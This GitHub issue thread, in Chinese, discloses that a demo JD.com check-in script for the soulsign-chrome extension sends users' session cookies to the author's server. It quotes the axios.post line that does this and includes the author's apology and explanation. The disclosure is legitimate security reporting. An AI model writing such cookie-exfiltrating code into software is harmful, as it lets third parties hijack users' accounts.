### ISSUE TITLE
【警告】该插件有**极大**风险 可能造成财产损失 请谨慎使用

### ISSUE THREAD

**Issue by MicroCBer** [inu1255/soulsign-chrome#265]
[此处京东签到](https://github.com/inu1255/soulsign-chrome/blob/b3929337d92eb2431bc4116d56c20c9c1d125865/public/demos/jr.jd.js
)会将Cookie泄露至第三方服务器！

危险代码如下：
```javascript
var {data} = await axios.post("https://quan2go.inu1255.cn/api/material/jd_cookie", {cookie: `pin=${pin}; thor=${thor};`}); // Line 44
```
## Cookie泄露的后果 
引用自[虎嗅](https://www.huxiu.com/article/11557.html)

> 这还不是Cookie被泄露最可怕的事情。在上图中，有一个后面带着“HttpOnly”字样的东西，它叫NTES_SESS。这是一个Session Cookie。所谓的Session Cookie，就是网站用以唯一标识用户身份的“密码”。之所以用户输入一次用户名密码后就不需要每次打开新页面都输入，就是因为网站靠这个Session Cookie识别出来该用户已经登陆过了。这也是网易大声告诉”贱人”们的事实之一。

> 没错，这其实是Cookie最最重要的用途。但它也是最最危险的。因为别人一旦知道了你的Session Cookie，他就可以伪装是你！你可以不介意饭馆的老板把你爱吃土豆的事情告诉其他的餐馆老板，但你能够接受有人以你的名义去饭馆吃饭，然后把帐算到你的头上吗？

> 获得了Session Cookie，就得到了网站的完全信任。他可以查看你的邮件，以你的身份发微博，甚至以你的身份消费。

为了几个京豆，让别人获得你的账户的**大部分访问权限**，这值得吗？

写出这样的代码，我只能说作者**居心叵测**！！

**Comment by nonzzz** [comment]
赞成。这种泄露用户信息的行为实在是可怕。

**Comment by nonzzz** [comment]
如果使用了京东脚本的建议关闭小额支付。防止出现问题

**Comment by MicroCBer** [comment]
https://github.com/inu1255/soulsign-chrome/commit/bd08c428f01c9e26f9f773664e34aba4e3b9119b

`remove npm from dependabot.yml`和京东签到有什么关系！
悄悄加个提交cookie，这就是malware行为！

**Comment by freemedom** [comment]
就京东脚本嘛

**Comment by inu1255** [comment]
首先承认错误，这确实是作者的问题，这段代码本来是自用的，不应该出现在GitHub的仓库中。
但是这绝不是恶意的，因为 public/demos 目录中的脚本只是给想开发脚本的同学的一个参考，不会集成到插件中的，并且我发布在脚本推荐网站的京东脚本是没有这一段代码的。
不过大家安装脚本的时候确实要注意一下，本人近两年换了工作比较忙，代码疏于维护，脚本推荐网站也没有做审查，希望大家安装脚本的时候注意看下代码吧，有看不懂的不用最好不要用。
在此感谢曾经一起维护这个仓库的几位同学，特别是 @yi-Xu-0100 。大家工作都忙，都有困难的生活，不然谁为了几个京东豆写个插件呀。曾经代码改变世界的梦想，现在只能为了赚钱白天干到黑，想陪陪家人都没什么时间。
真的比起ISSUE更想看到一些Pull Request，这个插件最初也只是自己的需求，我也没什么变现渠道。
这个ISSUS我会置顶，不放心的同学大可不用，最好别用。

**Comment by MicroCBer** [comment]
OK

**Comment by yi-Xu-0100** [comment]
我一直使用这个插件进行签到，自己也制作了许多脚本，非常感谢作者能够制作这样的插件！

如果有更好的需求希望有提交，也希望有更多的人参与开发！可以看出，随着时间的推移，我们都很难保持高强度的更新相关的内容，也请耐心等待开发者或者其他人的回复与帮助。

最后，欢迎有需要的朋友参与开发、讨论！如果你有更好的需求或者实现，也欢迎给出你的方案！
